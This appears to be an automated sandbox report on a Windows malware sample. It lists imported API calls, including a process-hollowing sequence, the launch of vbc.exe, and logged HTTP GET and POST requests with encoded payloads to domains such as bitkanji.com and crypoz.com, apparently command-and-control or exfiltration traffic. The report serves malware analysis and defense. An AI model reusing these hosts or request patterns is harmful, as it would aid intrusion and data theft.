uxtheme.dll.IsAppThemed kernel32.dll.CreateActCtxA ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree user32.dll.RegisterWindowMessageW user32.dll.GetSystemMetrics kernel32.dll.GetModuleHandleW kernel32.dll.LoadLibraryW user32.dll.AdjustWindowRectEx kernel32.dll.GetCurrentProcess kernel32.dll.GetCurrentThread kernel32.dll.DuplicateHandle kernel32.dll.GetCurrentThreadId kernel32.dll.GetCurrentActCtx kernel32.dll.ActivateActCtx kernel32.dll.GetProcAddress kernel32.dll.WideCharToMultiByte user32.dll.DefWindowProcW gdi32.dll.GetStockObject kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetUserPreferredUILanguages user32.dll.RegisterClassW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap user32.dll.CreateWindowExW user32.dll.SetWindowLongW user32.dll.GetWindowLongW nlssorting.dll.SortGetHandle nlssorting.dll.SortCloseHandle user32.dll.CallWindowProcW user32.dll.GetClientRect user32.dll.GetWindowRect user32.dll.GetParent kernel32.dll.DeactivateActCtx dwmapi.dll.DwmIsCompositionEnabled user32.dll.GetWindowTextLengthW user32.dll.GetWindowTextW user32.dll.GetProcessWindowStation user32.dll.GetUserObjectInformationA kernel32.dll.SetConsoleCtrlHandler user32.dll.GetClassInfoW kernel32.dll.GetStartupInfoW user32.dll.GetWindowPlacement user32.dll.GetDC gdi32.dll.GetDeviceCaps user32.dll.ReleaseDC user32.dll.CreateIconFromResourceEx user32.dll.SendMessageW user32.dll.GetSystemMenu user32.dll.EnableMenuItem user32.dll.SetWindowPos user32.dll.RedrawWindow user32.dll.ShowWindow user32.dll.GetWindowThreadProcessId user32.dll.PostMessageW ole32.dll.OleInitialize ole32.dll.CoRegisterMessageFilter user32.dll.PeekMessageW user32.dll.IsWindowUnicode user32.dll.GetMessageW user32.dll.TranslateMessage user32.dll.DispatchMessageW user32.dll.WaitMessage kernel32.dll.ReleaseMutex kernel32.dll.CreateMutexW kernel32.dll.CloseHandle shell32.dll.SHGetFolderPathW kernel32.dll.SetThreadErrorMode kernel32.dll.GetFileAttributesExW kernel32.dll.CompareStringOrdinal clr.dll.CreateAssemblyNameObject ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint clr.dll.CreateAssemblyEnum kernel32.dll.ResolveLocaleName kernel32.dll.LoadLibraryA kernel32.dll.GetModuleHandleA advapi32.dll.LookupPrivilegeValueW advapi32.dll.AdjustTokenPrivileges ntdll.dll.NtQuerySystemInformation kernel32.dll.CreateProcessA kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx kernel32.dll.ResumeThread user32.dll.DestroyIcon user32.dll.DestroyWindow user32.dll.PostThreadMessageW ole32.dll.CoUninitialize oleaut32.dll.#500 user32.dll.GetMessageA user32.dll.EnumThreadWindows user32.dll.IsWindowVisible ole32.dll.OleUninitialize ole32.dll.CoWaitForMultipleHandles user32.dll.SetClassLongW user32.dll.UnregisterClassW user32.dll.IsWindow advapi32.dll.EventUnregister kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.QueryActCtxW cryptsp.dll.CryptReleaseContext
Execute Commands
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven03b_64 | Seven03b_64 | VirtualBox | 2018-11-21 08:48:33 | 2018-11-21 08:53:29 | 296 |
16 HTTP Request(s) detected
http://www.zfk3.net/ca/?pPj0Qjn=GmpirGNGe6T+p+J2bEumNMpdWj2kSzDIwWn9qPG7N0PsrTxQLOGzsBP1/uIDnkTLPkymqIIo&9r=fdfLudThQ
- Hostname: www.zfk3.net
- IP Address:
- Port: 80
- Count: 1
GET /ca/?pPj0Qjn=GmpirGNGe6T+p+J2bEumNMpdWj2kSzDIwWn9qPG7N0PsrTxQLOGzsBP1/uIDnkTLPkymqIIo&9r=fdfLudThQ HTTP/1.1 Host: www.zfk3.net Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.bitkanji.com/ca/?pPj0Qjn=FiZ+iUpoQgne+bqV6KnaykpPOuf0yMZ4dOkbTUwF/uyUKIrhs+hl2DOE8fto2S4JUl5DomC2&9r=fdfLudThQ
- Hostname: www.bitkanji.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?pPj0Qjn=FiZ+iUpoQgne+bqV6KnaykpPOuf0yMZ4dOkbTUwF/uyUKIrhs+hl2DOE8fto2S4JUl5DomC2&9r=fdfLudThQ HTTP/1.1 Host: www.bitkanji.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.bitkanji.com/ca/
- Hostname: www.bitkanji.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.bitkanji.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.bitkanji.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bitkanji.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=NAVE8ygIJ3vioLaw7arHgAltA97nksBpbKZIUUFF9d2UY7LemPEou0T49rEWm0IJMVl_oG~z(8TBRcA8JST-v_0EfLQ77rPWQmysQzhH4qUNE82z2m77Nsn_2Zw56Uxfc6PEAPVZX8wswpMuc5pMLrqsxxzkLVAZaSb7Pp(ik1xa3aDnnl3v3ASGRt(mJoqOz4ksrrReX6nGZ-CrPLQN8N0fDLleBjh_kLu2VV05nthA~LvXH973XIyc229sg5OrQXGyip13FV0ZYhxTkj2aP0NGIsbSnqNcozDSNTktSX~C3Ai63NAFhmgqPGFW725AnXI6mhcRh6GE(S5nYwZj~wXpvPBN875lcyhmsPYfgYxaRcRiXsyXbOH5MBYH6O5LZLCF48kJsjB0oD(kI-MtDP5qdHRsHdsiC64IZ16FFHbn8bvERTiG~Iyvzou7NNDWpElV(HKVtW0_nEeh5d~B15vhUWh8LmHysRRXnDfP5-LTMJ7QgKNchze19hbaijqVqOej(PoXxg(FsOEBxi(XqCHNuYVkdHRIelc1BGbHilg_Hn(ku7QIqztYK5S8EXDmvcpIsXgAvQIHjfY_WY4pehMOAavYME8vEh375lWybazn0OsTrAculrrTkmoVp6iu3Ni-JIcg4BgYkws4CoTtQqimgbY918166iUd8OLd10e4S5YmHDleWZUYrJ~iNUHxbQR4i2JI~-22OpdFfRN5QOtmfSBx1iAsIVnfKoMf6WNSQ3bqL4UrCf2IVfxFOkhvJrSEmfdoCq3du7S1tRN2sa(bm6y8MYuawcfARP(blzVmAAbdtScuUOsz5VtHsWYCFOkvtF30pzvNYtvrE8jMV48_1YyfGjvUpGkT4gsF(TA1PnTO2ZLhvMgqx54NigL4(0tfpXnDqXKDyv6JFN8z36(DGf~BVj8BlQrNaAMKH6qFyz~5ywNO8dRUM2ChkNWLBnEjHSQSy6Ybf57XyWasMrz1LHdNwRs5X3JUs4DFvx0vrIQzaWKfKSvnFIv9LHH4ED0WU35C2N1vnWf6HQg1d6bDNVEeBw(NpNStx6THNzH4rdrjGujEVK3AJJQEpACO4bPPUT~UOV7-y_Ob9he60XnvCBeOZ6tjSk2LlU6xDJ4Q8CUkKK2K8vEnvTo1AXRBoQ3yo4F3TFWb(VrNlRqd22tn6DDGa27nwnQ2qdAGyuHlQ6pEWlLl~2gdDIrXOKMBijA51dVAuzjYj_9Pk1fcSznYovsBDtm4hOfRLJKUVc1_1BC2IQMi~eo8fjPikBSVQI1Zc2guwtBRzepIdyjJMbUEHu~6aueKW46QtVy62-OUyZm_HqX_3jZHZmPv027TT21BEnC1kEKYQgy12cj3Sagsj-tunNANA25oVclQdPI5w9Mh04nGHQRt9y7FtyyVQ8Yv7mF3lccMWj9y0yRYonpSyIVotkWNsCKxSUJRcYE3Zh23UcdMufxPr9Fgb_GPLL5h29E32280qIaYzlQgm76GBGPmtoPq(HYxpLBBT6U1SUOsPYvXorizLk7ZvCulwXMTvAQspnCbjoMmpsAYP1PynWWLcLXHDfO4xjcz1VTVgYP4SDDb9G0pD3VUssBtJAReotWGQSoQlKQHTyevrxRBQ8pbjDwh7B5M9QlkSoSKLj4CwywSeuu4yFOzdBgQbKYhgv6PKsdLR3r67DFlOxX98tIH8-yFr6mE4mGpl_pW1U46E9LmypnGieFW7TIjM-hOZob0NovV38QeEF4F3aKOdF1XZ2iJn1G42HwO7iWCPQ871B~rwK5hol(oYwLv7eAq8kV5wIS2jphMtX(X3L5vd2Ucp-SIThS3UqcqSTw9Mh1BT4gSZBtFBzl7bfUCAM22l02sP2drEh24TiMyFTBgAf2AwpBRHW(dmSpbY0xeGPvm5kIWa8VpQmTV(M8LeoCxiArolRHW9rTIy5IxKdBf7EKkgaO9gD(bFRhYqgxxucHpytVw6QL-FdJoCV(dm8EVkIovWZOskH(gU-vGrMWvGEl5sd8VfaA5YfyEN6D9IVJJVRkbudAjq5E_K3cjJyLo55rmE-g1zcnzjs2jhmp1OjU-EcrbulBJ2Zp4xhr5gr~uQwmmHXvpW81eR7jgkVkaoLBf2mBeYEIXahJ7IJgqbbk5kru94QYLjbnveKgfJmq1Sh~bVOnsftDPGC3IeHwemtd7053P\x00\x00\x00\x00\x00\x00\x00\x00
http://www.bitkanji.com/ca/
- Hostname: www.bitkanji.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.bitkanji.com Connection: close Content-Length: 57169 Cache-Control: no-cache Origin: http://www.bitkanji.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bitkanji.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=NAVE8zY2LHj_sOu5(f2alg56It~m4OR4EJR6UXNJy8nTLIDegKwl2ET77rFA3kM1Fn1noDHo(8rAadQkMxrlw_w0A4sY(pnZBEOKaWdH3-UPbZao7zLnPMT9uskK1DN-dZ(AJu1xT58jsdgVdaENPb~vjSPmL2knXwjjENTPtQZEh6jZnm7WtwizEc3WOum4hJgsobpoCNzIAYDrO4I06-86AKVVcCB8nIGcaRMKlspExLegGdO6a5Cxx3l5gN6Idzr_vopiCn4dOF8snCyCOEdgGLHS1-5av2WfJDkOQXmwtwjH3M07hRoMEmEdxVcah3x8sANWgLWEwVI7JiAj7wX2wPRk4LFucyxyt_QfnbVaV41hEcyXQuH3MBY16O5mZIuR(8sJqiNy6B3uOu0SPP5mQl56RtBsC5JVZVWFB2Pg55HAEyiFn9z0oYX8NNPfoF1z4lOEsW08sUS-us~j8MTILFBPMWS69xVYghOA45rHEtqlk5hbsiuS5h3CsxumruiVoe0BgALfs8c9hT79pCTy84pyWXhnaWMcHWfbtAkRCH7VpIkM6i0Eea~yRGzluq9P5UwFuQUIx98AW7EHZ3Y6QJL5Dk16Kkbf9GGff52H8bQxlxA3z4TluksDobWnu4G4NrkDzCZyxTdbdcKMfLjRyYsT4ddPkwYmtfH0(2TIUot5Kwx1Bp1xobGUM1(VAzBH7h9V4vCfJYJ9T3xSZYFDAUh51SxnIVvYLcQf5X9SGGbrLfAsZ_2CKPxjWE86JpymnfZoDdzT8o6JpGsEzK(TqeiJB5OjweTuQM6uhwVlHA7BuSclVugIuFhOxlwkF-o_0A2phWaIIq7uCd2KR4cB342NTBLzxSsvlile1yYxS2G10dHpx_0Z7YhLoSnp4BAA4Tm3yhnP99yREskRtaCKN5yeV2ohuAjeYhpGS_yT4R6TygBs5IFTMFPolsbIHUx9LwsErbs6e42s41nwO-elFHZR5w0kC1RerLCB8yV5qpYfYXm8UgfBX7DtCCj-JUFtdgs8l-JwkE(GMCsNUoL3e1BqCxrhivCWzNmnIknJi_n1JbaIXtyTdPIpnCiewMSENxuZCUyG1Lun0jDT2RO9AVKVTdRTSlGhmxSxB5gQ(1gkDqb-4dwPvhMJc3NAi2v8qbtoSX~D7QSJtUPm60IErCmGI13y3WE-9aN6ysXlRZd7GUmF(zIOEoTbPbsWlXsl5NR9iiSNl8t86De9dBHMqeQ6D4utuNqiMM(uVNZB5AqZPmYOyPcUED3SmFyUP69UJWknkO5jq5xSLVfRVq9vItivVouCcoDawnSJyZqg77iYB7HlyAMlU2v0tTr7E1B2OFezum2uehHyuMaSW84FqpNG6oI3ICp-V5pBZaQx9vwypey6Hxpk2Cb3~RW6UNcaskpWs4kYSTo40RgCn3dK3J5Kmm~Q31DWE1lDdPZic0miWtZutfwTitN0T8mPLIJ-wdAi3BkyqZaL7HxwzqS9U1GB95C1qXMEtplpVaMhZWmKGO238eeFc0H3rwCk1Wo1pyxy706z2owmqdh8blzg1m(KCoftSMOk0i8r1XnWg5G6bzHQzGh5OTV2mtl-CgZbm_26bgI2rfUHZmGwkS1vdesaiAot0ERf5jJCTYmeK15ZnCQsCMC-kW(uM0kVfLsZiKi1GuB5Ay(LijI-aEycv9IjneGotLas4nvVmsQQ1R05fdTjyePEq71B6RxWbP0XfJ7wSZ3wgvoNCFom4L~2YA1feXy73mjJwAQlpwvdFnpasia-z5ta5HT1eCbri9kT4l0JyKOI46JNuVHm~rlsQEFAoYi6QgraN50IZxZ9Az0mQ60CRyZDIxFSO_4NIdOEznerJE1rBDO_QCxuC387DfqvvIBxAnTNvQgzZVxhPfXv5kgiSsVPUEixwpImG72RrlCJsQb38obG7pAxDelt81SJwJiG706KXxZ7sDNw~f3r98Jc~BvOFp0IHX7i~_0Q46k1LZy1vHa_V93xgMuXFmBFscEGDPJbSPuFR_niFDtTUFsiv-8Hv60TLi01WjvO4p3SF_Ec99XZydD1k0paO0wcVsKAtEtX77Itoz(a4ryZPBemMVz8G4NhcIit1yETr5dk4n9BbGE_dRlMMJ4xX68LwY6fg1wQi5veM9VATHr-FAa4L46TXrryJ33ofn1B(7UqidaMs5kUfGHyL5112ZEm(8g2A20dEUhCTDfAp2fSAoVsjslEd32lIye7DcxNJN8p2EEPNZ594cwFJDA2ltxwb6QYLZYm2fKcweCVValPmJpvvtAzkOB7XxMF53f_Zsrmxx78Rew-TgYiTJh4u8vSGFfBlbsu1pqS8DpKo6jWdEDEs5V5lRQ8tDsmHVa3VFK_OVX-uaE_ymVK44HPU8vsx-AfK9qNkdoN7BzIE
http://www.crypoz.com/ca/?pPj0Qjn=Ty0EsBQ3fDA4ntQhx7mWPdGweQA6rpczL68ZEje3oFZHho6m4n/7NMDKIbNU8V0wLONC+wX9&9r=fdfLudThQ
- Hostname: www.crypoz.com
- IP Address: 0.0.0.0
- Port: 80
- Count: 1
GET /ca/?pPj0Qjn=Ty0EsBQ3fDA4ntQhx7mWPdGweQA6rpczL68ZEje3oFZHho6m4n/7NMDKIbNU8V0wLONC+wX9&9r=fdfLudThQ HTTP/1.1 Host: www.crypoz.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.crypoz.com/ca/
- Hostname: www.crypoz.com
- IP Address: 0.0.0.0
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.crypoz.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.crypoz.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.crypoz.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=bQ4-ymxHcTVHn6Qj09LpT5m-IQdpiJIYTdF9ORSE8WlArbGU5RXrVaKJXMVtgFUhId44(FGsuqNZEvHaVj10e5Vn7MYOp1Oeyyy96lJkRjDUOVByvMF532elQYq3nOTPiu~sevOB4pv7HKZbVnfQnuIQOit-cDiULHxL(a46nkh7YV~jn3zYHi6QVlZSDhbv8xx_8GiBiQWDQYLCMFB-SHmmmKrOk7EWjH22RzAyHR(BPVmkPryGwRErH-8mKXFom-T4RTVb(3d2n6lUM1zYierkpQeBGaLgXAXVRzDkCL7xrc~mSByCAj2M5dJTPMhXZXwPqHR2Ql(w8v03FHB-KDAUGajhPvBZIqM4KIiWkm6eJ7w3uXiuOYtrYtf8Bdeg(esW2LIpLxQxmmuSNI(naIyyDHx4g0dSZ2kq26nU8sjyDocdZmM9cNaIsibGISuIQE0NkVkIAZADIG4-5W6QXDaSj-sHQ0ftGRuYStNok4aIaP7j(Ccsd6WKLNjRJ5ENaQj3fjO4nWnM50gszg3vCQ5ES8vf9yWMyxc38SUsTEEpITxkj-1g84m_JyFc6Swvf5LEnpEOS8QGw-OZvh9SjR6eEuatReRwb6YteXl17x634RqbFcs6TTIWEmLW2p~N43nHtvBj2U3aFIqS5E62DEadmBdHLFw91N2iWYwlEjOkDkElf9r9htoTAGzsWxqglwKtjqzhZW2uDtMpSzWE3eIBSInF9pUy(x4TscmvMqL0OvQxX6Wedjf9696RGGtq3YrZh6JZUTq9p8Jy5lT0KcE6omFRS_zxvbKsBS2T50PGVvAkBY6VbhiE4of3(in-VGNTfM(Yl0SCoYafJEN6TxDA3IzEgTG6(NuQk6k2mCt00EKl7RUmVGAbgKhH3Tnd2jXgpa8l8EpChMGvsa9QXWJHlKK2P-dG35JL470WkNqs3vqakpyaynbhW686rkbxTKqv8YGqAA7_ppOe~B3GJ9lS5H2jcOm39wIkCq~OnP97R17V28~38RrWK7l0OARUV6WVHi04ljv8W2xK9HIGShtywcq1jFJkqh5BACtcYjQPqXc5Y7USf1kRaCHfZWQkH6HUVhhO4zJzab(RrAIg5spmTUC_K_sOqFVHR3nFt5apFod4TQel9ag_~DCT~l0Ou1mqfZJOrdrVnZyiuGe8cY3HK7mxW-93(sBSkkxKfeJBCAgxLxO322wdAVffpNirA3iPwmAO7ZJg~VcoFlaLfw9Yxuwe(tnOkO2Rq6yVnwngFPjZMdWuf4NfXKNjHYIhwtjg8Q6dzghjudzVmSHmsOiZxe65(qEItCyXfgxSqyi7gt8wvfCzM69R8WpwWVrwnDQgm6T4avNm3NKHn0ey72vPL-3QoC9aUyCYqyAKdgtLZ00WlppdVeLlh7CrVX1pg0f9b32U4SzDIGRT8oFuepdEHNHfUrnm2r58x6nJ8lxYE7LgfE~w(hzdCLPasux2(KS2TKzYzH6yKEzJgMkWY1iBxzI377suM7~-BCIC8iB4O24E~_(psKHUgucQnMi6irZqeDpJf9RL6fjlLIqKaYA3KytB0S0ckwBhXW(cnOQShefYYUsAH53J7-s9YM0cyqPwgGJR(lnF5vXqBFvv0woBnATfA8l9ECoIPAk3UAXIGCzaDNES6X~Wdax3FMuYEEU7CjZb25jdRI5tOOXxXG5gkzn53dQB1v3RjKcPrIK6lfgu3gXKbJONgAYyoZQbqjWLJg6yx14QmGL7Rax_JUtLfHdKp98MkEmDSlwWL8uSKUwRR6ZBalglCBMyDrEL7XRU13ZEVhhoviDrOBsRciXiCNZEEIIfnseXIYqvmvrYa-EaTI1S6MWY0dP7RIuufWY_X8m9UgB8rOgzSuRs1AuHKzKew_a499EqvLYLJbeFezE5nVo6WJtIiVFtH3Ie5vsBs3ydzlUGHp3hgfWqrtPaWHTL52gerYfzZJVqzt8p0bzPWvFHkDJU7LoxflRlQFf-ixYVRNSt5PlCWAGHuJerk1jA1IXDCXDrfig5tw2NHJVhLgiZiypIWHXouu5vumAPTZwKbe3cJDDqTJZ_SLNy6g5KKXa2B0jLJuo91-jW4GC47y5W8VpSEpUft9~LVLbvnAMG1_xlrKzvcYsydGcLo4GzZWBAheFojrKmH2kkyDLnUjlDmUNmL-OEjE7U9H1gfovI(JLS\x007053P\x00\x00
http://www.crypoz.com/ca/
- Hostname: www.crypoz.com
- IP Address: 0.0.0.0
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.crypoz.com Connection: close Content-Length: 57169 Cache-Control: no-cache Origin: http://www.crypoz.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.crypoz.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=bQ4-ynp5eDALwIpR5c75MIWTQQYm8rYnce9PORiAlH1ev72Uwy(oNqKKGsVykFZUW-51(ECGuqVaMtuechtjSJoUm88ttzKR1QO5(kxkfwfsEmo2t51LrmDDIoz5pdadhMSzZuCp1LvgbbZzXF(cq-cXbRQ1cky-MGxT8ax2qBB9K2aFnzrhKCLsfCFDJzuS3Wp_~2KRpyPFVf3aISVDZU~PuvPzoLkRkEemMGwJFVr3FnOcbrHI5idLcP0JKHptocngbWlgym1qsI98YyrmlubdxDuBMpSpUC(NJzDHOoKwl8~SSBmaBUf_ltJJBp5ESX4pz2hYRUPwu5ZzDB17FjAfZaT6ZJtoIuQSYpaWnkeeefs0i3iucYt1Ytf0BdfG(aUa5rApDQ8zmUmuMbjDE4yXGGxYk112Zxhv2a7U(fPxBMAZRXM6So6Y6STsISiFRAonh0ZWBZAACWl09X6cayq7sZZ7AUa6GxqtRPdkl7ucSrTzpQQwUbGtPNPJN7AAazfnZGvYhQLa4CsY~lP7eE57GvrF2jmj1Dxn9CgwHSZwGT9_psxk5ZuuFgpe4zAuZOfHo6UHX8cd6r~IoDBwmHu-SeGMUr9CCOUrPEEn~SPXwEWDdf5cZQw0XgT-9p6ItCLB1roThnvjN_mw4luCHDm9nRwiKF5fq8DpT7UETRizJVB6Le~Y2ewPAQ(ORQSEnRS42aLWKkaHP9oFPQKvj8Y4b87d96Mb(xwXsMivNqv0KsIyXZOZVTf7kN6NbWxU3arVm6dZDxC_u71CzSjDXsF3uidUW8rmvdr1ASKD0SLBfOhtP46SaAO_~ojiixPHV2J9GtDIwhGotJaWMlZ5FAj62ovWpCaN44eWgKUmyzlOq0~f9Q8uanQG1eoTgyjE3RO_irZbkSNFy-ORs71mY1dk59~pOrBmm5Bu4bA4~vuE~L60k5~C2zPmWOgUqBrbW5PvpJT_Gw2hooSL1mnjMtdx5nyJDayi3goUFdaJmcMtWX75(f2cyzbdMdFkGEcdcYLmO1oinQSUUhN6lns-CQFS1MeIgApE3mdqC1R1a0J5pkwvXK4qT2E_NAryaEh_YanrADBX(SQLXK7tzSUM7u4Cflq4O446qBRLRTvFjq6pGeR4awzT5rst~0q_zWpb7EK0d_dBprubt4O3hHnNXtvpNKzxPpFU9cZgzj9tfY9BCmsOPhTn5SpLA0mArdDjWUXO72kw2MNA2ywDZ0vqUEMR2a41~-(Hnszgp5blngLeeuLAPeyzC4ZNYblfFZ4gt-b-pwPIlhx33f(pigaqlLPI(cnti4oAozLRbGFhhz7div4H76ufE6Bo8lh1NTSbtVYHteviX7lq4NWToR6W00r2Hty7rRovSWDYqXNUQRBDXj8N4LYhW8r4w_3yQhorkFbqK130hDHfGXlU(Id7R5oJIr(xYvD74L1U0rL192hiR4PTdS(h4hyBMbWbnrt2(L6ydK2C9UOoNRe9puE7e0KcjhAf86w4AbakSQs2wi5SH1gqwv2c8_7-kuIqg925y69QFQJYfOZz1vflM4K7Ao8fLTFW6CkisSBmSWfinIIVg9eYRkpIM9qV97YHI9Rh1qH_uXRpwXH725TqIQHr~TdAvh(JD9l5OAMlL30OTwKJXE7eIJww1FTdMKpnU6idW34fBDVlspXZBOtyDOracHoBojnjkM1X3f6UjLlxpby9leIhiiWba42fshpI6LJxuD(oLBX19gtSviiHTZY7NlYgaFoHqcs-nnD8UlMtZ9(VGjVwNf1QU340Ew1uFe4P3AAuxzU0XmQdrC(qPCEGWCLhGfZSGrlmgtmnTPeBgsDRMcYOQJZT042S~cnSbbqhWCc3S7C6WUp87so0Ced-xgWVDTWh(qiy6MIbj80wGernJT95nVg0eZt6kyVTU1Rg2O9AuDujlngzGrv_8fOqye74BjPmsBZwl7f3bpcKyM4qyZDNf4kKgTdd7axTJRYXYnTj8j1MVeWohfAPEVuanNeXiUvs1KWJbl2JIik4xymgce97ZECwzhU7fWPfxvlHxz4UVIUqW_T5HizUWpt-Vbld7yhocUSoBRqIR84PvsnlgGfU6w5WkH1HD9kggKW9EM7Ugx497-9cqI(HRIxQQVBXnfq_OBAp1_IuhJC9XgMlyiLtHgh41WQLFJCEvjbJy28nD5rA68Sj~R3D40Hr5a~w1Bq1KsfLO_94IikeY_fcuLZer-C0QXckpHsMZUrhRliuED5VzVFJs6XaiSvdeaLKuek71JQakmuPAeeHVY~T6wVqm6yspBp18WwjA7Q4Dg8oJqOYUM6wn5xS6iJglLYouYsiX8MlqZbyT1KEkKxKfMbKGrpIMBTQobElFKXnVZ99UF8u2JYtQ7gTyjfoqbpX6r963slH9vB0gqVSNddMKvH_yjo
http://www.spitcrack.com/ca/?pPj0Qjn=6Jl+PEwfeDhIcC2Al4dSs+0ba36HHE3fxCBX0tSaN8OAgOv0/AOgA6i0WOIfnCPJrau4IShy&9r=fdfLudThQ
- Hostname: www.spitcrack.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?pPj0Qjn=6Jl+PEwfeDhIcC2Al4dSs+0ba36HHE3fxCBX0tSaN8OAgOv0/AOgA6i0WOIfnCPJrau4IShy&9r=fdfLudThQ HTTP/1.1 Host: www.spitcrack.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.spitcrack.com/ca/
- Hostname: www.spitcrack.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.spitcrack.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.spitcrack.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.spitcrack.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate pPj0Qjn=yrpERhkRP0prOXOsnOwEvIZ_VlSVP2v4jWUP2vOGEcmTw_z08Vu7bPC2d6UHmT7doaqAOHkMD1aaIsCXYEMbVQq0AFG_q62AXVZMS7PBKhxxSIXit-5HhLXRwYwqqD8Dzmobx3Sbipd2w79Nv3bOTIY7Al7UxyRHyldpyAnZspo9N48K4ZekkVJLfXTvjLN4sy(kREg20N2mtZkwmEamMW8MAv8UO4TRP765I-pqMfBo1ZFklrv7xSNf48xeAwJ8BQf41nke3fGB6lze6dFwzBnxZ_R2jugZO6dgZVvEJub9HfzHCjmVtkiML0b3azfBCljy40Tw2p3uad6DY0bTF3PJBm3eXtS2Y0Be0_GCjlwWDJFf6u0xqCcpUyM9OgtThI3YiKRgmAO29p~Z(dr8pAR1x9jQFREEuoOX1Gfh~ZcBjfKhIrlFk7CDBzQKpqHPud4kOej_lmYQjFuuSBOLOUWXHVsKZiKg53ihw6G-IvTUiLksC4fV1pZN0k7lW758bhJHiGwzTfgFwBoV~YaRsHYmtG4kvBBmyJ7GLokcQ68bA4mJIkJlhWJRORnC(HyERTtecQ~O2EIoyW8q(Mvic86J1HHYX77yhfKKP-HaJxW1Qbn8MZVnz0jevk5_AKsCvC(NgqB7W-okg56BXEuNub93TpVxOB0v616vzYJrhAXVkyZRivaclfSFnzAaRTJxjAcUU6dALdXsozh5PxvKwor70sw3VBQ29M8UgryuuSHxH8weJuZ8GYebtAxP8Z48~t8mbHjhu3QMre9sFn1iRaxP5BGoa6K2gl7WorIbVqra5Ucr6kNNPX7i5XqTGvaJYd71OTIAf2RVQVY5ZauK9uT38JI40VITIiUPPEsMonJyRgCiTxps8MdbXB7dWcWEJ04HNG4tIad3ofIwrKdXuiowpB470gtGvEFOCWRarDyCptlHNpo-vpNUzu7aozm8zxGlCCnCuKJvE6MHPhbQF9XAxRf3nD17zRb39NkLJ18f5Q3D4CYHOfjPK3xAAX9F(Welm7r8a_JeB5xhM69NtE7rN9(f(ARt49ksKYWgRSNrSTiaGQ9O8dO-iJhCX8fgNwbKKBPc0m5se52HXJqHx5LCQcTZ3eOyNpdk(523QwgJLZMsfVwee-sHLFU9crkuaGdqol9O4RDpvjgfGDpPVQupu9j5jqVV6pLOhXizhySbDCIRHuNII8AIRsQKmOdyIjenBIeVvh7GC-5HmfALLD8aFz4vPOf2yXYHztWmgLSo5aFPRNRDSyabA9kQHl6OpNxC(uy3NLuUpbKnokhbXke1zKpkIqtitmseaoeib4J9IHMHDlMf